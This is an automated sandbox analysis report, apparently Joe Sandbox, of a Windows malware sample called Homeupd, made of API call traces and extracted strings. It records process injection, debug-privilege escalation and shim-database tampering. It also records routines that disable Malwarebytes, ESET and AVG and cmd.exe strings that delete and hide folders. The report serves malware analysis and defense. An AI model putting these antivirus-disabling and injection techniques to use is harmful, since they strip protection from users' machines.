      • Part of subcall function 018F15CB: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 018F15E0
      • Part of subcall function 018F15CB: GetTokenInformation.ADVAPI32(?,00000019,00000000,00000000,018F3EB4), ref: 018F1600
      • Part of subcall function 018F15CB: GetLastError.KERNEL32(?,?,?,?,?,018F3EB4), ref: 018F1606
      • Part of subcall function 018F15CB: LocalAlloc.KERNEL32(00000000,018F3EB4), ref: 018F1616
      • Part of subcall function 018F15CB: GetTokenInformation.ADVAPI32(?,00000019,00000000,018F3EB4,018F3EB4), ref: 018F162F
      • Part of subcall function 018F15CB: GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,?,?,018F3EB4), ref: 018F1637
      • Part of subcall function 018F15CB: GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,?,?,018F3EB4), ref: 018F1647
      • Part of subcall function 018F15CB: LocalFree.KERNEL32(00000000), ref: 018F167D
      • Part of subcall function 018F15CB: CloseHandle.KERNEL32(?), ref: 018F1687
      • Part of subcall function 018F2005: Sleep.KERNEL32(000005DC), ref: 018F200A
      • Part of subcall function 018F36B6: Sleep.KERNEL32(00001388), ref: 018F36F9
      • Part of subcall function 018F2050: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F2099
      • Part of subcall function 018F2050: GetProcAddress.KERNEL32(00000000), ref: 018F20A0
      • Part of subcall function 018F2050: GetSystemInfo.KERNEL32(?), ref: 018F20B2
      • Part of subcall function 018F2050: GetVersionExA.KERNEL32(0000009C), ref: 018F20BF
    • Sleep.KERNEL32(00000BB8), ref: 018F3F03
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020006,018F3EA8), ref: 018F1171
    • lstrlenA.KERNEL32(?,?,?,018F12E5,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\,marker_gjru_fbegrihlgm,TRUE,00000000,018F3EA8), ref: 018F1180
    • RegSetValueExA.ADVAPI32(018F3EA8,?,00000000,00000001,?,00000000), ref: 018F119B
    • RegCloseKey.ADVAPI32(018F3EA8), ref: 018F11A6
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • EnumWindows.USER32(018F1D93,00000000), ref: 018F1E25
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd

    Non-executed Functions

    APIs
      • Part of subcall function 018F1456: GetVersionExA.KERNEL32(?), ref: 018F1484
      • Part of subcall function 018F1456: GetTokenInformation.ADVAPI32(00000000,00000012,018F1BF1,00000004,?), ref: 018F14B7
      • Part of subcall function 018F1456: CloseHandle.KERNEL32(00000000), ref: 018F14D0
      • Part of subcall function 018F15CB: GetCurrentProcess.KERNEL32 ref: 018F15D3
      • Part of subcall function 018F15CB: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 018F15E0
      • Part of subcall function 018F15CB: GetTokenInformation.ADVAPI32(?,00000019,00000000,00000000,018F3EB4), ref: 018F1600
      • Part of subcall function 018F15CB: GetLastError.KERNEL32(?,?,?,?,?,018F3EB4), ref: 018F1606
      • Part of subcall function 018F15CB: LocalAlloc.KERNEL32(00000000,018F3EB4), ref: 018F1616
      • Part of subcall function 018F15CB: GetTokenInformation.ADVAPI32(?,00000019,00000000,018F3EB4,018F3EB4), ref: 018F162F
      • Part of subcall function 018F15CB: GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,?,?,018F3EB4), ref: 018F1637
      • Part of subcall function 018F15CB: GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,?,?,018F3EB4), ref: 018F1647
      • Part of subcall function 018F15CB: LocalFree.KERNEL32(00000000), ref: 018F167D
      • Part of subcall function 018F15CB: CloseHandle.KERNEL32(?), ref: 018F1687
    • GetModuleHandleA.KERNEL32(00000000), ref: 018F1C10
    • GetModuleFileNameW.KERNEL32(00000000,?,?,00000000), ref: 018F1C17
    • lstrcatW.KERNEL32(?, /C "), ref: 018F1C58
    • lstrcatW.KERNEL32(?,?), ref: 018F1C68
    • lstrcatW.KERNEL32(?,018F56AC), ref: 018F1C76
    • CreateThread.KERNEL32(00000000,00000000,018F1BBA,00000000), ref: 018F1C9E
    • CloseHandle.KERNEL32(00000000), ref: 018F1CA5
    • ShellExecuteExW.SHELL32(0000003C), ref: 018F1CB1
    • ExitProcess.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 018F1CD3
      • Part of subcall function 018F1A83: Sleep.KERNEL32(00000064), ref: 018F1ABD
      • Part of subcall function 018F1A83: lstrcmpiA.KERNEL32(?,TRUE,?,?,?,?,?,00000000), ref: 018F1AFB
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetTempPathA.KERNEL32(00000104,018FF6B8), ref: 018F35F1
    • lstrcatA.KERNEL32(018FF6B8,\..\..\LocalLow\), ref: 018F3603
      • Part of subcall function 018F186F: lstrcpyA.KERNEL32(018F3554,018FF6B8,?,018F189F,018F3554,018FF6B8,?,?,?,018F3554,?), ref: 018F187A
      • Part of subcall function 018F186F: lstrcatA.KERNEL32(018F3554,00000000,?,018F189F,018F3554,018FF6B8,?,?,?,018F3554,?), ref: 018F1889
      • Part of subcall function 018F33C1: wvsprintfA.USER32(?,?,018F3B52), ref: 018F342D
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 018F3461
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F346A
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 018F3477
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F347A
      • Part of subcall function 018F33C1: PathGetArgsA.SHLWAPI(?), ref: 018F34A9
      • Part of subcall function 018F33C1: lstrcpynA.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F34B7
      • Part of subcall function 018F33C1: ShellExecuteExA.SHELL32(?,?,?,?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3509
      • Part of subcall function 018F33C1: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3519
    • DeleteFileA.KERNEL32(?), ref: 018F3632
      • Part of subcall function 018F191D: GetTempPathA.KERNEL32(00000104,?), ref: 018F1950
      • Part of subcall function 018F191D: lstrcatA.KERNEL32(?,\..\..\LocalLow\), ref: 018F1962
      • Part of subcall function 018F191D: GetEnvironmentVariableA.KERNEL32(username,?,000000FF), ref: 018F1979
      • Part of subcall function 018F191D: wsprintfA.USER32(00000000,%s\cmd.%s.bat,?,?), ref: 018F1995
    • DeleteFileA.KERNEL32(?), ref: 018F3648
    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 018F3673
    • lstrcatA.KERNEL32(?,\AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb), ref: 018F3685
    • DeleteFileA.KERNEL32(?), ref: 018F368E
      • Part of subcall function 018F11B1: LoadLibraryA.KERNEL32(advapi32.dll), ref: 018F11C8
      • Part of subcall function 018F11B1: GetProcAddress.KERNEL32(00000000), ref: 018F11CF
      • Part of subcall function 018F11B1: RegOpenKeyExA.ADVAPI32(80000002,018F36A0,00000000,00020106,?), ref: 018F11EE
      • Part of subcall function 018F11B1: RegDeleteKeyA.ADVAPI32(80000002,018F36A0), ref: 018F1215
      • Part of subcall function 018F11B1: RegCloseKey.ADVAPI32(?), ref: 018F1220
    Strings
    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\iscsicli.exe\, xrefs: 018F3690
    • \AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb, xrefs: 018F3679
    • \..\..\LocalLow\, xrefs: 018F35FD
    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f48a0c57-7c48-461c-9957-ab255ddc986e}\, xrefs: 018F36A0
    • "%%windir%%\system32\sdbinst.exe" /q /u "%s", xrefs: 018F3618
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetTempPathA.KERNEL32(00000104,018FF6B8), ref: 018F3536
    • lstrcatA.KERNEL32(018FF6B8,\..\..\LocalLow\), ref: 018F3542
      • Part of subcall function 018F1891: CreateFileA.KERNEL32(018F3554,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F18B1
      • Part of subcall function 018F1891: WriteFile.KERNEL32(00000000,018FF400,0000020E,?,00000000), ref: 018F18D5
      • Part of subcall function 018F1891: FlushFileBuffers.KERNEL32(00000000), ref: 018F18DE
      • Part of subcall function 018F1891: WriteFile.KERNEL32(00000000, RECTEXE,0000006C,?,00000000), ref: 018F190A
      • Part of subcall function 018F1891: FlushFileBuffers.KERNEL32(00000000), ref: 018F190D
      • Part of subcall function 018F1891: CloseHandle.KERNEL32(00000000), ref: 018F1910
      • Part of subcall function 018F19A0: lstrcpynA.KERNEL32(?,?,00000104,?,00000000), ref: 018F19E9
      • Part of subcall function 018F19A0: GetModuleHandleA.KERNEL32(00000000), ref: 018F19F3
      • Part of subcall function 018F19A0: GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 018F19FA
      • Part of subcall function 018F19A0: wsprintfA.USER32(?,start "" "%s",?,?,00000000), ref: 018F1A13
      • Part of subcall function 018F19A0: CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F1A2B
      • Part of subcall function 018F19A0: GetLastError.KERNEL32 ref: 018F1A38
      • Part of subcall function 018F19A0: lstrlenA.KERNEL32(?,00000000), ref: 018F1A48
      • Part of subcall function 018F19A0: WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 018F1A5E
      • Part of subcall function 018F19A0: GetLastError.KERNEL32 ref: 018F1A6D
      • Part of subcall function 018F19A0: CloseHandle.KERNEL32(00000000), ref: 018F1A76
    • DeleteFileA.KERNEL32(?), ref: 018F35C8
      • Part of subcall function 018F33C1: wvsprintfA.USER32(?,?,018F3B52), ref: 018F342D
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 018F3461
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F346A
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 018F3477
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F347A
      • Part of subcall function 018F33C1: PathGetArgsA.SHLWAPI(?), ref: 018F34A9
      • Part of subcall function 018F33C1: lstrcpynA.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F34B7
      • Part of subcall function 018F33C1: ShellExecuteExA.SHELL32(?,?,?,?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3509
      • Part of subcall function 018F33C1: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3519
    • DeleteFileA.KERNEL32(?), ref: 018F35BF
      • Part of subcall function 018F14DC: GetModuleHandleA.KERNEL32(kernel32), ref: 018F14F3
      • Part of subcall function 018F14DC: GetProcAddress.KERNEL32(00000000), ref: 018F14FA
      • Part of subcall function 018F14DC: GetCurrentProcess.KERNEL32 ref: 018F1515
    Strings
    APIs
    • LoadLibraryA.KERNEL32(user32.dll), ref: 018F2E6C
    • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 018F2E89
    • GetProcAddress.KERNEL32(00000000,CreateSystemThreads), ref: 018F2E9A
    • FreeLibrary.KERNEL32(00000000), ref: 018F2EFC
    Strings
    APIs
    • GetCurrentProcess.KERNEL32 ref: 018F20FD
    • OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 018F2104
    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 018F211B
    • AdjustTokenPrivileges.ADVAPI32(018F3F1A,00000000,?,00000010,00000000,00000000), ref: 018F213B
    • CloseHandle.KERNEL32(018F3F1A), ref: 018F2144
    Strings
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 018F2268
    • Process32First.KERNEL32(00000000,?), ref: 018F22A0
    • lstrcmpiA.KERNEL32(?,018F3781,00000000,00000000,?,00000002,00000000), ref: 018F22B4
    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 018F22CA
      • Part of subcall function 018F2150: GetModuleHandleA.KERNEL32(00000000), ref: 018F215C
      • Part of subcall function 018F2150: VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 018F2175
      • Part of subcall function 018F2150: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 018F2187
      • Part of subcall function 018F2150: VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 018F21AB
      • Part of subcall function 018F2150: VirtualProtectEx.KERNEL32(?,018F22DF,00001000,00000040,?), ref: 018F21DD
      • Part of subcall function 018F2150: WriteProcessMemory.KERNEL32(?,018F22DF,018F22DF,00001000,?), ref: 018F21ED
      • Part of subcall function 018F2150: VirtualQueryEx.KERNEL32(?,018F22DF,?,0000001C), ref: 018F2211
      • Part of subcall function 018F2150: LoadLibraryA.KERNEL32(ntdll.dll), ref: 018F2223
      • Part of subcall function 018F2150: GetProcAddress.KERNEL32(00000000), ref: 018F222A
    • CloseHandle.KERNEL32(00000000), ref: 018F22E2
    • Process32Next.KERNEL32(00000000,00000128), ref: 018F22F0
    APIs
    • GetUserNameA.ADVAPI32(?,?), ref: 018F1849
    • wsprintfA.USER32(019001C8,com.%s.sdb,?,?,?,018FF6B8), ref: 018F1861
    Strings
    APIs
    • GetEnvironmentVariableA.KERNEL32(ALLUSERSPROFILE,?,00000104), ref: 018F236A
    • lstrcatA.KERNEL32(?,\Malwarebytes\Malwarebytes Anti-Malware\,?,?,?,?,?,?,?,80000002), ref: 018F2382
    • GetEnvironmentVariableA.KERNEL32(ProgramData,?,00000104), ref: 018F2391
    • lstrcatA.KERNEL32(?,\Malwarebytes\Malwarebytes Anti-Malware\,?,?,?,?,?,?,?,80000002), ref: 018F23A3
    • lstrcmpA.KERNEL32(?,?,?,?,?,?,?,?,?,80000002), ref: 018F23B3
    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F23E1
    • lstrcatA.KERNEL32(?,exclusions.dat,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F23EF
    • DeleteFileA.KERNEL32(?), ref: 018F2409
    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F2444
    • lstrcatA.KERNEL32(?,Configuration\settings.conf,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F2452
    • DeleteFileA.KERNEL32(?), ref: 018F246C
    • lstrcatA.KERNEL32(?,?), ref: 018F24AB
    • lstrcatA.KERNEL32(?,Configuration\scheduler.conf), ref: 018F24B9
    • DeleteFileA.KERNEL32(?), ref: 018F24D3
    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F250F
    • lstrcatA.KERNEL32(?,exclusions.dat,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F251D
      • Part of subcall function 018F152F: GetFileAttributesA.KERNEL32(018F3A22), ref: 018F1535
    • DeleteFileA.KERNEL32(?), ref: 018F2537
    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F2572
    • lstrcatA.KERNEL32(?,Configuration\settings.conf,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F2580
    • DeleteFileA.KERNEL32(?), ref: 018F259A
    • lstrcatA.KERNEL32(?,?), ref: 018F25D9
    • lstrcatA.KERNEL32(?,Configuration\scheduler.conf), ref: 018F25E7
    • DeleteFileA.KERNEL32(?), ref: 018F2601
      • Part of subcall function 018F17A4: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F17BF
      • Part of subcall function 018F17A4: WriteFile.KERNEL32(00000000,?,018F3B8B,?,00000000), ref: 018F17DA
      • Part of subcall function 018F17A4: FlushFileBuffers.KERNEL32(00000000), ref: 018F17F1
      • Part of subcall function 018F17A4: CloseHandle.KERNEL32(00000000), ref: 018F17F8
      • Part of subcall function 018F17A4: GetLastError.KERNEL32(?,?,?,018F3B8B,?,?,00000001,?,80000002), ref: 018F1808
      • Part of subcall function 018F122C: RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,?), ref: 018F1244
      • Part of subcall function 018F122C: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000000), ref: 018F126F
      • Part of subcall function 018F122C: RegCloseKey.ADVAPI32(?), ref: 018F127A
    • lstrcatA.KERNEL32(?,C:\Program Files\Malwarebytes Anti-Malware), ref: 018F2663
    • lstrcatA.KERNEL32(?,\mbam.dll), ref: 018F2671
    • LoadLibraryA.KERNEL32(?), ref: 018F267A
    • GetProcAddress.KERNEL32(00000000,ProtectionStop), ref: 018F268E
    • GetProcAddress.KERNEL32(00000000,SchedulerStop), ref: 018F2698
    • GetProcAddress.KERNEL32(00000000,SelfProtectionDisable), ref: 018F26A3
    • Sleep.KERNEL32(000007D0), ref: 018F26C1
      • Part of subcall function 018F1545: CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 018F1554
      • Part of subcall function 018F1545: Process32First.KERNEL32(00000000,?), ref: 018F156D
      • Part of subcall function 018F1545: lstrcmpA.KERNEL32(?,018F26D1,00000000,0000000F,00000000,00000000,00000000), ref: 018F1587
      • Part of subcall function 018F1545: OpenProcess.KERNEL32(00000001,00000000,?), ref: 018F159A
      • Part of subcall function 018F1545: TerminateProcess.KERNEL32(00000000,00000009), ref: 018F15A9
      • Part of subcall function 018F1545: CloseHandle.KERNEL32(00000000), ref: 018F15B0
      • Part of subcall function 018F1545: Process32Next.KERNEL32(00000000,00000128), ref: 018F15BA
      • Part of subcall function 018F1545: CloseHandle.KERNEL32(00000000), ref: 018F15C5
    Strings
    • ProductPath, xrefs: 018F263C
    • exclusions.dat, xrefs: 018F23E3
    • SchedulerStop, xrefs: 018F2690
    • \Malwarebytes\Malwarebytes Anti-Malware\, xrefs: 018F2397
    • Configuration\scheduler.conf, xrefs: 018F24AD
    • ProgramData, xrefs: 018F238C
    • SelfProtectionDisable, xrefs: 018F269A
    • mbam.exe, xrefs: 018F26C7
    • Configuration\settings.conf, xrefs: 018F2446
    • ALLUSERSPROFILE, xrefs: 018F2365
    • Configuration\settings.conf, xrefs: 018F2574
    • \Malwarebytes\Malwarebytes Anti-Malware\, xrefs: 018F2376
    • Configuration\scheduler.conf, xrefs: 018F25DB
    • \mbam.dll, xrefs: 018F2665
    • exclusions.dat, xrefs: 018F2511
    • ProtectionStop, xrefs: 018F2688
    • C:\Program Files\Malwarebytes Anti-Malware, xrefs: 018F2657
    • SYSTEM\CurrentControlSet\services\MBAMProtector\Parameters, xrefs: 018F2641
    APIs
      • Part of subcall function 018F26D7: RegOpenKeyExA.ADVAPI32(00000104,?,00000000,00020119,?), ref: 018F26EF
      • Part of subcall function 018F26D7: RegQueryValueExA.ADVAPI32(?,?,00000000,?), ref: 018F271A
      • Part of subcall function 018F26D7: RegCloseKey.ADVAPI32(?), ref: 018F2725
    • lstrcatA.KERNEL32(?,?,?,80000002), ref: 018F385D
    • lstrcatA.KERNEL32(?,\updfiles,?,80000002), ref: 018F386B
    • lstrcatA.KERNEL32(?,?,?,?,?,?,80000002), ref: 018F388D
    • lstrcatA.KERNEL32(?,\lastupd.ver,?,?,?,?,80000002), ref: 018F389B
    • DeleteFileA.KERNEL32(?), ref: 018F38AA
    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,80000002), ref: 018F38CC
    • lstrcatA.KERNEL32(?,\upd.ver,?,?,?,?,?,?,?,80000002), ref: 018F38DA
    • DeleteFileA.KERNEL32(?), ref: 018F38E3
      • Part of subcall function 018F152F: GetFileAttributesA.KERNEL32(018F3A22), ref: 018F1535
    • Sleep.KERNEL32(00001B58), ref: 018F3915
      • Part of subcall function 018F33C1: wvsprintfA.USER32(?,?,018F3B52), ref: 018F342D
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 018F3461
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F346A
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 018F3477
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F347A
      • Part of subcall function 018F33C1: PathGetArgsA.SHLWAPI(?), ref: 018F34A9
      • Part of subcall function 018F33C1: lstrcpynA.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F34B7
      • Part of subcall function 018F33C1: ShellExecuteExA.SHELL32(?,?,?,?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3509
      • Part of subcall function 018F33C1: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3519
    • Sleep.KERNEL32(00001B58), ref: 018F392B
    • Sleep.KERNEL32(00001B58), ref: 018F3941
    • Sleep.KERNEL32(00001B58), ref: 018F3957
    • Sleep.KERNEL32(00001B58), ref: 018F396D
    • Sleep.KERNEL32(00001B58), ref: 018F3983
    • Sleep.KERNEL32(00001B58), ref: 018F3999
    Strings
    • cmd.exe /c md "%s", xrefs: 018F394A
    • cmd.exe /c attrib +R +S +H /D /S "%s", xrefs: 018F3934
    • cmd.exe /c rmdir /S /Q "%s", xrefs: 018F38FD
    • cmd.exe /c md "%s", xrefs: 018F391E
    • \updfiles, xrefs: 018F385F
    • SOFTWARE\ESET\ESET Security\CurrentVersion\Info, xrefs: 018F381C
    • AppDataDir, xrefs: 018F3817
    • cmd.exe /c attrib +R +S +H /D /S "%s", xrefs: 018F398C
    • cmd.exe /c md "%s", xrefs: 018F3976
    • cmd.exe /c attrib +R +S +H /D /S "%s", xrefs: 018F3960
    • \upd.ver, xrefs: 018F38CE
    • \lastupd.ver, xrefs: 018F388F
    APIs
      • Part of subcall function 018F26D7: RegOpenKeyExA.ADVAPI32(00000104,?,00000000,00020119,?), ref: 018F26EF
      • Part of subcall function 018F26D7: RegQueryValueExA.ADVAPI32(?,?,00000000,?), ref: 018F271A
      • Part of subcall function 018F26D7: RegCloseKey.ADVAPI32(?), ref: 018F2725
    • lstrcpyA.KERNEL32(?,?,?,80000002), ref: 018F3A00
    • lstrcatA.KERNEL32(?,\Avg2015\,?,80000002), ref: 018F3A14
      • Part of subcall function 018F152F: GetFileAttributesA.KERNEL32(018F3A22), ref: 018F1535
    • lstrcpyA.KERNEL32(?,?,?,?,?,?,80000002), ref: 018F3A4B
    • lstrcatA.KERNEL32(?,\Avg2014\,?,?,?,?,80000002), ref: 018F3A59
    • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,80000002), ref: 018F3A90
    • lstrcatA.KERNEL32(?,\Avg2013\,?,?,?,?,?,?,?,80000002), ref: 018F3A9E
    • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F3AD1
    • lstrcatA.KERNEL32(?,\Avg2012\,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F3ADF
    • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F3B12
    • lstrcatA.KERNEL32(?,\Avg2011\,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F3B20
    • lstrcatA.KERNEL32(?,update,?,80000002), ref: 018F3B2E
    • Sleep.KERNEL32(00001B58), ref: 018F3B59
    • CreateDirectoryA.KERNEL32(?,00000000), ref: 018F3B68
    • lstrcatA.KERNEL32(?,\download,?,80000002), ref: 018F3B7A
      • Part of subcall function 018F17A4: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F17BF
      • Part of subcall function 018F17A4: WriteFile.KERNEL32(00000000,?,018F3B8B,?,00000000), ref: 018F17DA
      • Part of subcall function 018F17A4: FlushFileBuffers.KERNEL32(00000000), ref: 018F17F1
      • Part of subcall function 018F17A4: CloseHandle.KERNEL32(00000000), ref: 018F17F8
      • Part of subcall function 018F17A4: GetLastError.KERNEL32(?,?,?,018F3B8B,?,?,00000001,?,80000002), ref: 018F1808
      • Part of subcall function 018F33C1: wvsprintfA.USER32(?,?,018F3B52), ref: 018F342D
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 018F3461
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F346A
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 018F3477
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F347A
      • Part of subcall function 018F33C1: PathGetArgsA.SHLWAPI(?), ref: 018F34A9
      • Part of subcall function 018F33C1: lstrcpynA.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F34B7
      • Part of subcall function 018F33C1: ShellExecuteExA.SHELL32(?,?,?,?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3509
      • Part of subcall function 018F33C1: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3519
    Strings
    APIs
    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 018F2CD5
    • GetLastError.KERNEL32(?,00000000), ref: 018F2CE0
    • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 018F2CF2
    • GetLastError.KERNEL32(?,00000000), ref: 018F2CFD
    • GetProcAddress.KERNEL32(00000000,ZwAllocateVirtualMemory), ref: 018F2D09
    • GetLastError.KERNEL32(?,00000000), ref: 018F2D14
      • Part of subcall function 018F2BD1: LocalAlloc.KERNEL32(00000040,?), ref: 018F2BF9
      • Part of subcall function 018F2BD1: GetLastError.KERNEL32(?,00000000), ref: 018F2C05
      • Part of subcall function 018F2BD1: StrStrIA.SHLWAPI(00000020,018F69EC), ref: 018F2C33
      • Part of subcall function 018F2BD1: StrStrIA.SHLWAPI(00000020,exe), ref: 018F2C42
      • Part of subcall function 018F2BD1: LocalFree.KERNEL32(00000000), ref: 018F2C72
    • LoadLibraryA.KERNEL32(?), ref: 018F2D30
    • GetLastError.KERNEL32(?,00000000), ref: 018F2D38
    • GetProcAddress.KERNEL32(00000000,PsLookupProcessByProcessId), ref: 018F2D44
    • GetCurrentProcessId.KERNEL32 ref: 018F2D4F
    • FreeLibrary.KERNEL32(?), ref: 018F2D67
    Strings
    APIs
    • wvsprintfA.USER32(?,?,018F3B52), ref: 018F342D
    • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 018F3461
    • GetProcAddress.KERNEL32(00000000), ref: 018F346A
    • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 018F3477
    • GetProcAddress.KERNEL32(00000000), ref: 018F347A
    • PathGetArgsA.SHLWAPI(?), ref: 018F34A9
    • lstrcpynA.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F34B7
    • ShellExecuteExA.SHELL32(?,?,?,?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3509
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3519
    Strings
    APIs
      • Part of subcall function 018F26D7: RegOpenKeyExA.ADVAPI32(00000104,?,00000000,00020119,?), ref: 018F26EF
      • Part of subcall function 018F26D7: RegQueryValueExA.ADVAPI32(?,?,00000000,?), ref: 018F271A
      • Part of subcall function 018F26D7: RegCloseKey.ADVAPI32(?), ref: 018F2725
